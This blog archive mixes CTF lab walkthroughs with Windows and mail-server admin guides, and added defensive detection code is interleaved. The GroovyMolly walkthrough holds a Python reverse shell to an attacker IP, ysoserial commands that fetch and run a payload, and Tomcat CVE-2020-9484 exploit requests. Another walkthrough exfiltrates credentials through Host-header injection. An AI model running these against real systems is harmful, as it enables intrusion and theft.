StackOverCTF – Walk Through – CyberTalents

This was one of the challenges in the qualification round of the Digital Pakistan Cyber Security Hackathon 2022.
Details:
Category: Web Security
Level: Hard
Points: 200

Steps:
Since this is a web challenge, open the CTF link in a web browser (Google Chrome in our case).


The first page shows two links:
1) Post Question
2) Show Latest Question


The Post Question page shows a form with 3 input fields:
1) Question
2) Category
3) Animation


Enter aaaa in the Question field, bbbb in Category and cccc in Animation.
On submission, the page sets a cookie in the browser named latest_question whose value is a base64-encoded string:

latest_question=rO0ABXNyACJjb....GFhYWE=

On a Kali machine, decode the base64 string:

echo rO0ABXNyACJjb....GFhYWE=|base64 -d

The decoded result is mostly binary with a few readable strings, which can be seen in the image below:

(image: base64-encoded serialized object)
The presence of java/lang/String in the data confirms that this is a serialized Java object.
The characters rO0 at the start of the base64 data are themselves a tell-tale sign of a serialized Java object, although honestly we did not notice that at the time.

Now when we visited the Show Latest Question page, aaaa was displayed.
This means that the page base64-decodes the cookie, deserializes it and prints our question.

At this point it was obvious that the vulnerability is insecure deserialization.
To exploit it, one must understand the structure of the object being deserialized.

To understand the structure of the Java object, we used a tool called SerializationDumper.

Save the object to a file and then use the tool to see its structure:
echo rO0ABXNyACJjb....GFhYWE=|base64 -d>/tmp/obj01

Using SerializationDumper tool:
java -jar SerializationDumper-v1.13.jar -r /tmp/obj01

With the object structure known, we needed to find the vulnerable function that leads to code execution.
We had two options: fuzz the web application with different code-execution payloads, or analyze the application further for clues.

On further analysis, a web directory /backup was observed with 2 Java source files:
QuestionController.java
QuestionDebug.java

The QuestionDebug.java file had what we were looking for, the vulnerable function:
(image: QuestionDebug.java source code)

Now we needed a Java compiler so we could craft the QuestionDebug Java class.

We used the online Java compiler at jdoodle.com for this purpose, since we had no Java compiler installed on our machine and no time to install one during the competition.
(image: crafted Java object in JDoodle)

After this, we had to generate and decode the final Java object.
Make sure to create the correct Java class hierarchy as shown in the images.
Using the code from QuestionDebug.java and QuestionController.java, we were able to write the final payload generator.
(image: Java payload generator in JDoodle)

The value of serialVersionUID must be kept the same, or the payload will not work.
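The same cookie inspection can be automated on the defending side. The Python below is an added example, not code from the write-up or the challenge: it base64-decodes a cookie value, recognises the Java serialization stream header (0xACED0005, which is what the rO0AB prefix encodes), reads the outer class name and serialVersionUID that SerializationDumper displayed, and flags any stream whose class is not on an allowlist. The sample stream and the class name com.example.Question are constructed for the example.

```python
import base64
import struct

# Constants from java.io.ObjectStreamConstants.
STREAM_MAGIC = 0xACED      # base64 of AC ED 00 05 ... starts with "rO0AB"
STREAM_VERSION = 0x0005
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72


def decode_cookie_value(value):
    """Base64-decode a cookie value; tolerate stripped '=' padding and the URL-safe
    alphabet. Returns None when the value is not base64 at all."""
    value = value.strip()
    padded = value + "=" * (-len(value) % 4)
    decoder = base64.urlsafe_b64decode if ("-" in value or "_" in value) else base64.b64decode
    try:
        return decoder(padded)
    except ValueError:
        return None


def java_stream_info(raw):
    """Return None unless raw begins with a Java serialization stream header.
    Otherwise return the outer class name and serialVersionUID when the stream
    starts with TC_OBJECT TC_CLASSDESC (as the challenge cookie does)."""
    if raw is None or len(raw) < 4:
        return None
    if struct.unpack(">HH", raw[:4]) != (STREAM_MAGIC, STREAM_VERSION):
        return None
    info = {"class_name": None, "serial_version_uid": None}
    if len(raw) >= 8 and raw[4] == TC_OBJECT and raw[5] == TC_CLASSDESC:
        # classDesc: modified-UTF8 class name (2-byte length prefix), then 8-byte SUID
        (name_len,) = struct.unpack(">H", raw[6:8])
        name = raw[8:8 + name_len]
        if len(name) == name_len:
            info["class_name"] = name.decode("utf-8", errors="replace")
            suid = raw[8 + name_len:16 + name_len]
            if len(suid) == 8:
                (info["serial_version_uid"],) = struct.unpack(">q", suid)
    return info


def check_cookie(value, allowed_classes):
    """Verdict for a detection rule: 'not-serialized', 'serialized-allowed' or
    'serialized-unexpected'. Even an allowed class is worth logging: the only
    robust fix is not to deserialize client-controlled data at all."""
    info = java_stream_info(decode_cookie_value(value))
    if info is None:
        return "not-serialized"
    if info["class_name"] in allowed_classes:
        return "serialized-allowed"
    return "serialized-unexpected"


def build_sample_stream(class_name, serial_version_uid):
    """Constructed sample (not the challenge's object): the first bytes of a stream
    for one object of class_name, enough for the parser above."""
    name = class_name.encode("utf-8")
    return (struct.pack(">HH", STREAM_MAGIC, STREAM_VERSION)
            + bytes([TC_OBJECT, TC_CLASSDESC])
            + struct.pack(">H", len(name)) + name
            + struct.pack(">q", serial_version_uid))


def sample_cookie(class_name, serial_version_uid):
    """Base64 form of build_sample_stream, as it would appear in latest_question."""
    return base64.b64encode(build_sample_stream(class_name, serial_version_uid)).decode()


if __name__ == "__main__":
    cookie = sample_cookie("com.example.Question", 1234567890)
    print(cookie[:8], java_stream_info(decode_cookie_value(cookie)))
    print(check_cookie(cookie, {"com.example.Question"}))
    print(check_cookie(base64.b64encode(b"aaaa").decode(), {"com.example.Question"}))
```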

We used requestbin.net as our HTTP listener so we could receive the output of the code execution.

Open the Show Latest Question page in the browser, which initially printed aaaa.

Open the Chrome Developer Console by pressing Ctrl+Shift+I and enter the final payload as the cookie value.
(image: setting the cookie in the Chrome Developer Console)

We refreshed the page and our payload executed: the HTTP request arrived at RequestBin.

The flag was in the file flag.txt in the home directory.

The files used in this CTF can be downloaded from here:
https://www.asktaimoor.com/stuff/ctf/stackoverctf.zip

If you have any questions, please feel free to ask in comments.

Thanks to CyberTalents for this great challenge 🙂

GroovyMolly – Walk Through – echoCTF

IP Address: 10.0.40.34
Description: You may be thinking that Groovy Molly is random but its not…
Extra Info: Try to make the server spill the beans. You will have to combine both services to make something worthwhile…

Steps:
We start by entering the IP address in the browser, which returns nothing.

Our next step was an Nmap scan:
nmap -Pn -T5 -n 10.0.40.34
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-23 15:28 Pakistan Standard Time
Nmap scan report for 10.0.40.34
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
2121/tcp open ccproxy-ftp
8080/tcp open http-proxy


Nmap done: 1 IP address (1 host up) scanned in 3.75 seconds

First we hit port 8080, because it looks like a web service port.
Opening http://10.0.40.34:8080/ in the browser, we get the text "Simple is not always Easy".
Checking the HTML source of this page, we see a comment with our first flag: ETSCTF_x

This page has many other strings, but after playing with GET, POST, session and cookie parameters we got nothing.

Next we hit http://10.0.40.34:8080/test to get the web server details:
Apache Tomcat/10.0.0-M4

We looked online for available exploits for this web server version and found a PoC for CVE-2020-9484.

For this exploit to work, we must first get a file of our own onto the target system.

Moving on to port 2121, which looks like a custom FTP port, but let's use netcat to make sure:
nc 10.0.40.34 2121

The command returns "220 Service ready for new user.", which confirms that it is an FTP service.

Now we log in to the FTP service anonymously using:
Username: anonymous
Password: root@localhost

Once logged in, we find two files in the FTP folder:
One is our second flag, ETSCTF_xx
The other is a README.txt file with the text:
Default user root directory.PWD:/opt/apache-ftpserver-1.1.1/res/home/

We now know that the FTP server is Apache FTP Server version 1.1.1.

We then tried to upload files to the FTP server, which gave "Permission Denied" errors, meaning anonymous users do not have enough rights.

We looked for Apache FTP Server 1.1.1 exploits online, but nothing worked.

We downloaded Apache FTP Server 1.1.1 to see if we could find any further clues.

Looking at the configuration files, we found the default credentials:
Username: admin
Password: admin

Logging in to the FTP server with these, we can now write files.

We have to generate the stager payload files that we will upload to the FTP service to make this exploit work.

On our Kali machine we create a file named payload.sh with the following content:
#!/usr/bin/bash
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.0.54",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

In the same directory, run this command so we can transfer our final payload to the target server:
python -m SimpleHTTPServer 8888

We downloaded ysoserial and ran these commands to generate the stager payload files:
java -jar ysoserial.jar Groovy1 'curl http://10.10.0.54:8888/payload.sh -o /tmp/payload.sh' > downloadPayload.session

java -jar ysoserial.jar Groovy1 'chmod 777 /tmp/payload.sh' > chmodPayload.session

java -jar ysoserial.jar Groovy1 'bash /tmp/payload.sh' > executePayload.session

We switched the FTP transfer mode to binary; otherwise the exploit does not work.

Run a Netcat listener on the attacker machine using:
nc -nlvp 80

We uploaded these three stager payload files to the FTP server and then ran the Tomcat exploit discussed above:
curl 'http://10.0.40.34:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/apache-ftpserver-1.1.1/res/home/downloadPayload'

curl 'http://10.0.40.34:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/apache-ftpserver-1.1.1/res/home/chmodPayload'

curl 'http://10.0.40.34:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/apache-ftpserver-1.1.1/res/home/executePayload'

As soon as we run the last curl command, we get our Netcat reverse connection, and guess what, Tomcat runs as root by default 🙂
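From the defending side, the requests above are easy to spot: a genuine Tomcat session id is 32 hex characters (optionally followed by a .jvmRoute suffix), so a JSESSIONID containing path separators never matches. The Python below is an added example, not part of the write-up: it validates JSESSIONID values found in a constructed access-log format, decoding URL-encoding first so %2F-style variants are caught too. The real fix for CVE-2020-9484 is a patched Tomcat; this check is only a detection layer.

```python
import re
from urllib.parse import unquote

# A Tomcat session id from the default SessionIdGenerator is 32 upper-case hex
# characters, optionally followed by ".<jvmRoute>" when sticky sessions are used.
VALID_JSESSIONID = re.compile(r"^[0-9A-F]{32}(\.[A-Za-z0-9_-]+)?$")

# Constructed access-log layout for the example: client ip, request line, Cookie header.
LOG_RE = re.compile(r'^(?P<ip>\S+) "(?P<request>[^"]*)" "(?P<cookie>[^"]*)"$')


def parse_cookie_header(header):
    """Split a Cookie header into a name -> value dict (first occurrence wins here)."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name and name not in cookies:
            cookies[name] = value
    return cookies


def jsessionid_verdict(value):
    """None for a well-formed id, otherwise a short reason for alerting."""
    decoded = unquote(value)  # also catch %2e%2e%2f-style encodings
    if VALID_JSESSIONID.match(decoded):
        return None
    if ".." in decoded or "/" in decoded or "\\" in decoded:
        return "path traversal in session id (CVE-2020-9484 pattern)"
    return "malformed session id"


def scan_access_log(lines):
    """Return (client ip, request line, reason) for every request whose JSESSIONID
    is not a well-formed Tomcat session id; lines without JSESSIONID are ignored."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        cookies = parse_cookie_header(match.group("cookie"))
        if "JSESSIONID" not in cookies:
            continue
        reason = jsessionid_verdict(cookies["JSESSIONID"])
        if reason:
            findings.append((match.group("ip"), match.group("request"), reason))
    return findings


# Constructed sample log: the exploit request from the write-up (once plain, once
# URL-encoded) plus two benign requests.
SAMPLE_LOG = [
    '10.10.0.54 "GET /index.jsp HTTP/1.1" '
    '"JSESSIONID=../../../../../opt/apache-ftpserver-1.1.1/res/home/downloadPayload"',
    '10.10.0.54 "GET /index.jsp HTTP/1.1" '
    '"JSESSIONID=..%2F..%2F..%2Fopt%2Fapache-ftpserver-1.1.1%2Fres%2Fhome%2FexecutePayload"',
    '192.0.2.7 "GET /index.jsp HTTP/1.1" "JSESSIONID=1A2B3C4D5E6F708192A3B4C5D6E7F809; theme=dark"',
    '192.0.2.8 "GET /index.jsp HTTP/1.1" "theme=light"',
]

if __name__ == "__main__":
    for ip, request, reason in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {request!r}: {reason}")
```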

Since we are root, we easily get the remaining flags using these commands:
cat /etc/passwd | grep ETSCTF -> ETSCTF_xxx
cat /etc/shadow | grep ETSCTF -> ETSCTF_xxxx
ls -lah /root/ | grep ETSCTF -> ETSCTF_xxxxx
env | grep ETSCTF -> ETSCTF_xxxxxx

That’s all.

If you feel something is confusing, please feel free to write in comments.

Thanks to echoCTF for providing this interesting challenge 🙂

Notes:
1- Replace "10.10.0.54" with your attacker IP address.
2- Simple bash reverse shell variations didn't work for some reason; only the Python shell worked.
3- We had to get a hint from the Discord channel regarding the "binary mode" switch in the FTP service.

How To Fix Google Chrome SSL Warning

Starting from September 2021, devices running Windows 7 and older Windows versions began to show "Invalid SSL Certificate" warnings.

As a result, many commonly used websites (speedtest.net for instance) stopped opening properly or did not load at all.

After trying multiple solutions online, this one worked for me on multiple Windows 7 systems.

All you need to do is download these CA certificates and install them one by one:
https://secure.globalsign.net/cacert/Root-R1.crt
https://letsencrypt.org/certs/lets-encrypt-r3.pem
https://letsencrypt.org/certs/isrg-root-x2.pem
https://letsencrypt.org/certs/isrgrootx1.pem

Once you have installed all these certificates, just restart your browser and you are good to go.

Now you can test by opening any website that was previously throwing errors.

If you are having any issues, feel free to ask in comments and I’ll be glad to help.

References:
https://www.stephenwagner.com/

Teotihuacan – Walk Through – echoCTF

IP Address: 10.0.30.190
Description: Just like the pyramids of Teotihuacán, this target feels like a step-pyramid
Extra Info: Just like a step-pyramid from Teotihuacán, you have to climb step-by-step until you reach the top. You have to get the following flags

Steps:
Like any other target, we start by simply entering the IP Address in browser.
Opening http://10.0.30.190/ returns PHP code, and anyone with basic PHP skills knows what this code does.
Now we enter http://10.0.30.190/?hasAdminAccess=true in the browser to get our first flag.
ETSCTF_x

Along with the flag, we got a message that says “The next challenge is located at switch_and_twist” and a link to http://10.0.30.190/switch_and_twist/

Again we have a piece of PHP code, but this time it requires some intermediate PHP skills to understand what it does.

Using Postman, we have to send the request below:
http://10.0.30.190/switch_and_twist/
hmac=" "
host="asdasdasd"
nonce=""
Note: I had to debug this PHP code on local Apache to fully understand its logic.

Now we got our second flag ETSCTF_xx with the message “The next challenge is located at overprinting” and a link to http://10.0.30.190/overprinting/

Again we are presented with PHP code, and this time it requires basic arithmetic knowledge along with advanced PHP understanding.

After some trial and error, playing with this PHP code on a local Apache, we finally got the code required to pass this challenge:
http://10.0.30.190/overprinting/?print=print=111111

As a result, we get our third flag:
“The next challenge is located at /got_creds/ ETSCTF_xxx”

If you really know PHP well, you will notice another piece of logic in this code, and so we found another code:
http://10.0.30.190/overprinting/?print=011111

As expected, this code gives us our fourth flag:
“Awesome work, here is anothe flag for your troubles ETSCTF_xxxx”

Now we hit http://10.0.30.190/got_creds/ and get some NodeJS code.
This code is fairly simple and does not require any deep NodeJS skills.

From the NodeJS code we get a link to http://10.0.30.190/got_creds/example

Upon hitting the above link, we get a JSON response with our fifth flag:
{"body":{"ETSCTF":"ETSCTF_xxxxx"}}

Now we have no more hints, so there must be something more to do with this NodeJS code.
On close inspection, we see a call:
http.get(`http://${req.headers.host}?auth=${JSON.stringify(credentials)}`

Using Postman, we send a request to http://10.0.30.190/got_creds/example with the Host header set to our attacker IP, which in our case is 10.10.0.123.

Before sending the request, run a netcat listener on the attacker machine using:
nc -nlvp 80

As soon as we send the request from Postman, we get our sixth and final flag on the netcat listener:
ETSCTF_xxxxxx

That’s all.

If you feel something is confusing, please feel free to write in comments.

Thanks to echoCTF for providing this CTF 🙂

WannaCrypt Ransomware: Prevention and Cure

(image: WannaCry ransomware)

As they say, prevention is better than cure, so better safe than sorry!

In this case there is currently no cure, so we are left with prevention only.

WannaCrypt/WannaCry/Wcry is a new ransomware that exploits the SMB vulnerability in Windows addressed by the MS17-010 security bulletin.

More details about this exploit and how it spreads are available everywhere, so let's jump to the prevention part.

Since the worm spreads via SMB, which uses port 445, we have to close port 445 on our Windows systems.

Below are the steps to close port 445 and prevent a WannaCrypt infection:

Disable NetBIOS
First of all you need to disable NetBIOS (ports 137, 138 and 139).

  • Go to Start menu > Control Panel and open System.
  • In Hardware tab, click the Device Manager button.
  • Click Show Hidden Devices from the View menu.
  • Expand Non-Plug And Play Drivers.
  • Right-click NetBios Over Tcpip and select Disable.
  • Close all dialogs and restart the system.
Uninstall SMB
SMB uses port 139 and sometimes 445, so we need to uninstall this service.

  • Go to Start menu > Control Panel and open Network Connections.
  • One by one, select your network interfaces (i.e., Local Area Network) and select Properties.
  • Select Client For Microsoft Networks and click the Uninstall button.
  • Once the uninstall finishes, select File And Printer Sharing For Microsoft Networks and click the Uninstall button.
  • Repeat these steps for all network interfaces.
  • Close all dialogs and restart the system.

These steps are only meant to prevent WannaCrypt from infecting your system. If the system is already infected, isolate it from the network so it doesn't infect other machines, and wait until the *cure* arrives.

Best of luck 🙂

    Complete Guide: Setup Mail Server on CentOS

    Mail Server CentOS Postfix Dovecot SquirrelMail
    Background
    A few days back I felt the need to have my own mail server on my VPS so that I can send and receive email from my own account (@AskTaimoor.com). One option was to set up cPanel on my VPS, but it has its own issues: cPanel is costly and comes with lots and lots of additional features. It is best for web hosting providers, so it was of no use to me. If you plan to set up lots of email accounts on lots of domains, you should consider buying cPanel or another commercial product. My requirement was just to set up a few email accounts on a few domains that I personally manage. Also, I always prefer open source solutions because of their security and community support.

    I followed tutorials on many websites, but most of them were outdated and led to errors and other issues. After spending hours, I found one tutorial that was more recent than the others but lengthy as hell. Following the steps provided there, I was able to send and receive email from a nice, simple web interface. Here I am writing down those steps without unnecessary discussion of each and every step, the problems I faced and how I managed to fix them.

    Limitations
    There are a few limitations of this setup that I should point out before I start:

    • Account Management
      You cannot create, delete or modify email accounts directly from the final interface you will get. All the mail accounts map to local user accounts on the underlying Linux system.

    • Password Change
      Passwords cannot be changed from the interface for the same reason. They have to be changed manually from the console or using some Postfix plugin.

    • Non-Fancy Interface
      The web interface you will get is not stylish, but it is simple and straightforward. Don't expect a fancy-looking interface like Hotmail or Gmail.

    • Security
      Although we will be running everything with limited permissions, there are still some security problems with this setup, e.g. MITM attacks (the webmail front-end is served over plain HTTP, for instance).

    If you are OK with these limitations, go ahead; otherwise go for the alternative solutions mentioned above.

    Prerequisites

    • Basic Linux Knowledge
      If you don't know basic Linux terminology or the basic commands, you might feel lost. If that is the case, seek help from a Linux pro.

    • Static IP
      Most VPS and dedicated server providers allot static IPs. If you don't have one, or you are setting this up on a home server, this simply won't work for you.

    • SSH Access
      You must have SSH access to your server using PuTTY or other means. This is a must so that you can run commands on your server.

    • root Access
      This tutorial assumes that you are the administrator of this server, so you must have root access in order to install anything at all.

    Installation Steps
    Before you start, make sure you have logged in over SSH and switched to root.

    • Hostname
      Your server's hostname or FQDN should match your mail domain. If you are going for [email protected], your hostname should be mydomain.com.
      To find your current hostname, type hostname in SSH.
      If it is not set correctly, change it by entering hostname mydomain.com

    • hosts File
      Enter vi /etc/hosts
      Append this at the end of the file (if it is not there already):
      w.x.y.z mydomain.com mydomain www.mydomain.com

    • Reverse DNS
      Your server's public IP address should resolve back to your FQDN. This is not set by default; it usually has to be configured from your server's control panel, or you will need to contact your hosting provider. Look for rDNS, Reverse DNS, PTR Records or Network Settings in your server control panel.
      Once configured, run the command host w.x.y.z, where w.x.y.z is your server's public IP address, and the result should be:
      z.y.x.w.in-addr.arpa domain name pointer mydomain.com.

    • Setup MX Domain Records
      Add these records to your DNS manually or from your domain control panel:

      mail A w.x.y.z
      mydomain.com. MX 10 mail.mydomain.com.

      Don't forget to restart your DNS server if you entered the records manually.

    • EPEL Repository
      Some components of this setup are not in the default repository. To fix that, we add the latest EPEL repository:

      # make sure to add the proper repo version for your system
      wget http://download.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
      rpm -ivh epel-release-6-8.noarch.rpm

    • Disable SELinux
      To avoid mysterious errors, I suggest turning off SELinux temporarily (setenforce 0 lasts until the next reboot). Enter this command to do so:
      setenforce 0

    • Setup Mail Accounts
      As pointed out above, all mail accounts map to local Linux user accounts. That means we need to create users on our server:

      # for setting up [email protected]
      useradd contact
      passwd contact

    • Setup Postfix
      Postfix is the backbone of this whole setup, so it must be installed and configured properly before going any further.

      # to make sure everything is up-to-date.
      yum update

      yum install postfix -y

      # remove sendmail as it conflicts with postfix
      yum remove sendmail -y

      # use your favorite text editor. mine is vi
      vi /etc/postfix/master.cf

      # find the submission line, un-comment it together with the -o lines below it, and change
      # them to look like this (the -o lines must be indented and must have no spaces around "="):
      submission inet n - n - - smtpd
        -o syslog_name=postfix/submission
        -o smtpd_tls_wrappermode=no
        -o smtpd_tls_security_level=encrypt
        -o smtpd_sasl_auth_enable=yes
        -o smtpd_client_restrictions=permit_mynetworks,permit_sasl_authenticated,reject
        -o milter_macro_daemon_name=ORIGINATING

      # to tell postfix about your hostname
      vi /etc/postfix/main.cf

      # find these lines, un-comment them and change them to look like below:
      myhostname = mail.mydomain.com
      mydomain = mydomain.com
      myorigin = $mydomain
      inet_interfaces = all
      inet_protocols = all
      mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain
      mynetworks = localhost, 127.0.0.0/8, w.x.y.z
      home_mailbox = Maildir/

      # to make sure postfix runs on startup
      chkconfig postfix on

      # restart postfix
      service postfix restart

      If you see errors when starting Postfix, you have missed something. For error details, enter this command:
      tail -f /var/log/maillog
      Once Postfix runs without errors, run this command to send a test email to another address of yours:
      mail my_email@my_isp.com
      Press Ctrl+D to send the mail.
      Now open that mailbox and check the Inbox or Junk/Spam folder to confirm that your test email has arrived.

    • Setup Dovecot
      yum install dovecot -y

      vi /etc/dovecot/dovecot.conf

      # find this line, un-comment it and change it to look like this:
      protocols = imap pop3 lmtp

      vi /etc/dovecot/conf.d/10-mail.conf

      # find this line, un-comment it and change it to look like this:
      mail_location = maildir:~/Maildir

      vi /etc/dovecot/conf.d/10-auth.conf

      # find these lines, un-comment them and change them to look like below:
      disable_plaintext_auth = yes
      auth_mechanisms = plain login

      vi /etc/dovecot/conf.d/10-master.conf

      # find these lines, un-comment them and change them to look like below:
      user = postfix
      group = postfix

      # run dovecot on startup
      chkconfig dovecot on

      service dovecot start

    • Setup SquirrelMail

      # run squirrelmail wizard
      cd /usr/share/squirrelmail/config/
      ./conf.pl

      # enter 1 to setup your organization details
      # again enter 1 to edit the organization details
      # enter all your details and press S to save them and finally press R to return to main menu

      # enter 2 to setup mail server details
      # again enter 1 to set your domain name (mydomain.com)
      # enter 3 and then enter 2 to change from Sendmail to SMTP

      # finally press S followed by Q to save and exit the squirrelmail wizard

    • Setup Apache
      Apache is installed on most servers by default. If not, install it by typing:

      yum install httpd -y

      Once Apache is properly installed, configure it to serve the SquirrelMail front-end:

      vi /etc/httpd/conf/httpd.conf

      # add the lines below at the end of the file:
      Alias /webmail /usr/share/squirrelmail
      <Directory /usr/share/squirrelmail>
        Options Indexes FollowSymLinks
        RewriteEngine On
        AllowOverride All
        DirectoryIndex index.php
        Order allow,deny
        Allow from all
      </Directory>

      # restart apache server
      service httpd restart

      Open http://w.x.y.z/webmail in your browser and you will be greeted by the SquirrelMail login page:
      (image: SquirrelMail login page)
      Log in with the mail account you created earlier.
      If you have reached this point without any errors, pat yourself on the back: you have completed 60% of the whole setup.

    • Setup Multiple Accounts
      Postfix allows us to send and receive email for different addresses on different domains using a single Linux user account.
      To make it work, enter the following commands:

      vi /etc/postfix/main.cf

      # find these lines, un-comment them and change them to look like below:
      virtual_alias_domains = mydomain.com mypersonaldomain.net myofficialdomain.org
      virtual_alias_maps = hash:/etc/postfix/virtual

      vi /etc/postfix/virtual

      # add as many accounts as you want at the end of the file in this format:
      [email protected] contact
      [email protected] contact
      [email protected] contact
      [email protected] contact
      [email protected] contact

      # every time you edit the virtual file, you must run these commands:
      postmap /etc/postfix/virtual
      postfix reload

      Email received for the above addresses will land in the inbox of the contact user. You can set up as many addresses as you wish by mapping them to local Linux user accounts, but setting up too many is not recommended.

    • Setup SPF Records
      SPF records are used by most mail servers to fight spam. If you don't have one, chances are that all your outgoing mail will land in the recipient's junk/spam folder.
      Add this record to your DNS manually or from your domain control panel:

      @ TXT "v=spf1 mx a ip4:w.x.y.z"

      Don't forget to restart your DNS server if you entered the record manually.

    • Setup DKIM Keys
      Just like SPF, DKIM is a mechanism designed to fight spam. Failing to set it up will cause your email to be caught by spam filters or never reach the recipients at all. Perform the following to prevent this:

      yum install opendkim -y

      vi /etc/opendkim.conf

      # append the following lines at the file's end:
      AutoRestart Yes
      AutoRestartRate 10/1h
      UMask 002
      Syslog yes
      SyslogSuccess Yes
      LogWhy Yes

      Canonicalization relaxed/simple

      ExternalIgnoreList refile:/etc/opendkim/TrustedHosts
      InternalHosts refile:/etc/opendkim/TrustedHosts
      KeyTable refile:/etc/opendkim/KeyTable
      SigningTable refile:/etc/opendkim/SigningTable

      Mode sv
      PidFile /var/run/opendkim/opendkim.pid
      SignatureAlgorithm rsa-sha256

      UserID opendkim:opendkim

      Socket inet:12301@localhost

      vi /etc/default/opendkim

      # find this line, un-comment it and change it to look like this:
      SOCKET="inet:12301@localhost"

      # configure postfix to use DKIM as mail filter
      vi /etc/postfix/main.cf

      # find these lines, un-comment them and change them to look like below:
      milter_protocol = 2
      milter_default_action = accept
      smtpd_milters = inet:localhost:12301
      non_smtpd_milters = inet:localhost:12301

      # setup dkim directory structure
      mkdir /etc/opendkim
      mkdir /etc/opendkim/keys

      # specify which hosts should be trusted
      vi /etc/opendkim/TrustedHosts

      # append the following lines at the end of the file:
      w.x.y.z
      *.mydomain.com

      # create a key table
      vi /etc/opendkim/KeyTable

      # append this line at the end of the file:
      mail._domainkey.mydomain.com mydomain.com:mail:/etc/opendkim/keys/mydomain.com/mail.private

      # create signing table
      vi /etc/opendkim/SigningTable

      # append this line at the end of the file:
      *@mydomain.com mail._domainkey.mydomain.com

      # setup public and private keys
      cd /etc/opendkim/keys
      mkdir mydomain.com
      cd mydomain.com
      opendkim-genkey -s mail -d mydomain.com
      chown opendkim:opendkim mail.private

      # open mail.txt and copy the domain record
      vi mail.txt

      # the domain record should look like this (do not use this, it is just a sample):
      mail._domainkey IN TXT "v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC5e4Yg/0fTwxDZlDB
      8MThaqhifXvrniu6AQfBd+11zucb7ZMtEGHrutlUXC4cHCe4Xj5NoU6
      DHQOJTd6DcOt3R88Ik40mpg98EWozAL3RGTb6FifGJEg7s7WFB0x2oE
      hT/yFTwHVMOCDOnQgGvr3iftmzKGy7kMyFbVKGWDHtx9QIDAQAB"

      # restart postfix and opendkim to update the latest changes
      service postfix restart
      service opendkim restart


      Add the record you copied from mail.txt to your DNS manually or from your domain control panel:

      mail._domainkey IN TXT "v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC5e4Yg/0fTwxDZlDB
      8MThaqhifXvrniu6AQfBd+11zucb7ZMtEGHrutlUXC4cHCe4Xj5NoU6
      DHQOJTd6DcOt3R88Ik40mpg98EWozAL3RGTb6FifGJEg7s7WFB0x2oE
      hT/yFTwHVMOCDOnQgGvr3iftmzKGy7kMyFbVKGWDHtx9QIDAQAB"

      Don't forget to restart your DNS server if you entered the record manually.
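The SPF and DKIM records above can be sanity-checked offline before they are published. The Python below is an added example and not part of the original guide: it parses an SPF record and a DKIM record, decodes the DKIM p= public key far enough to read the RSA modulus size, and reports the two things most likely to bite: the guide's SPF record has no terminal all mechanism, and the sample DKIM key is only 1024 bits. The address 203.0.113.10 is a constructed stand-in for w.x.y.z; the DKIM p= value is the sample record printed in the guide.

```python
import base64
import re

# Records as this guide publishes them. The SPF address is a constructed stand-in for
# w.x.y.z; the DKIM p= value is the sample key shown in the guide's mail.txt.
SPF_RECORD = "v=spf1 mx a ip4:203.0.113.10"
DKIM_RECORD = (
    "v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC5e4Yg/0fTwxDZlDB"
    "8MThaqhifXvrniu6AQfBd+11zucb7ZMtEGHrutlUXC4cHCe4Xj5NoU6"
    "DHQOJTd6DcOt3R88Ik40mpg98EWozAL3RGTb6FifGJEg7s7WFB0x2oE"
    "hT/yFTwHVMOCDOnQgGvr3iftmzKGy7kMyFbVKGWDHtx9QIDAQAB"
)

SPF_MECHANISMS = {"all", "include", "a", "mx", "ptr", "ip4", "ip6", "exists"}


def check_spf(record):
    """Return a list of findings for an SPF TXT record (empty list means it looks fine)."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["record does not start with v=spf1"]
    findings = []
    has_all = False
    for term in terms[1:]:
        if "=" in term:  # modifiers such as redirect= or exp=
            continue
        qualifier = term[0] if term[0] in "+-~?" else "+"
        mech = term.lstrip("+-~?").split(":", 1)[0].split("/", 1)[0].lower()
        if mech not in SPF_MECHANISMS:
            findings.append(f"unknown mechanism '{term}'")
        elif mech == "ptr":
            findings.append("'ptr' is deprecated and expensive for receivers to evaluate")
        elif mech == "all":
            has_all = True
            if qualifier == "+":
                findings.append("'+all' authorises every host on the internet; use -all or ~all")
    if not has_all:
        findings.append("no terminal 'all' mechanism: senders not listed get a Neutral result, "
                        "so receivers cannot reject forged mail; append -all or ~all")
    return findings


def _der_tlv(buf, pos):
    """Read one DER tag/length/value at pos; return (tag, value, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: low bits give the number of length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def rsa_modulus_bits(spki_der):
    """Modulus size of an RSA SubjectPublicKeyInfo (the DER that DKIM's p= carries)."""
    _, spki, _ = _der_tlv(spki_der, 0)         # SEQUENCE { algorithm, subjectPublicKey }
    _, _, pos = _der_tlv(spki, 0)              # skip AlgorithmIdentifier
    _, bitstring, _ = _der_tlv(spki, pos)      # BIT STRING; first byte = unused-bit count
    _, rsakey, _ = _der_tlv(bitstring[1:], 0)  # RSAPublicKey SEQUENCE { n, e }
    _, modulus, _ = _der_tlv(rsakey, 0)
    return int.from_bytes(modulus, "big").bit_length()


def parse_dkim_tags(record):
    tags = {}
    for part in record.split(";"):
        key, sep, value = part.strip().partition("=")
        if sep:
            tags[key.strip()] = value.strip()
    return tags


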